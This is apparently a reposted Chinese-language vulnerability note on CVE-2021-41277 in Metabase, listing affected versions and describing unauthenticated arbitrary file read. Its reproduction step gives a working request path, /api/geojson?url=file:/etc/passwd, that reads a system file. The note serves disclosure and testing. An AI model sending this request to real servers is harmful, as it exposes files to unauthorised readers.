cve_2021_41277

Posted 【码猿】

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了cve_2021_41277相关的知识,希望对你有一定的参考价值。

cve_2021_41277

Metabase概述

Metabase可以帮助你把数据库中的数据更好的呈现给更多人,数据分析人员通过建立一个”查询“(Metabase中定义为Question)来提炼数据,再通过仪表盘(Dashboards)来组合展示给公司成员

漏洞影响版本

metabase version < 0.40.5
metabase version >= 1.0.0, < 1.40.5

漏洞概述

该漏洞的某个地址存在未授权访问,并且能够进行任意文件的读取

漏洞复现

对存在该漏洞的网站进行拼接/api/geojson?url=file:/etc/passwd

复现截图

以上是关于cve_2021_41277的主要内容,如果未能解决你的问题,请参考以下文章

CVE-2021-41277——Metabase 信息泄露漏洞

CVE-2021-41277 Metabase 敏感信息泄漏

Metabase 敏感信息泄露漏洞复现(CVE-2021-41277)

Metabase 敏感信息泄露漏洞复现(CVE-2021-41277)

Polkit漏洞(CVE-2021-4034)

CVE-2021-4034_Polkit提权漏洞复现与修复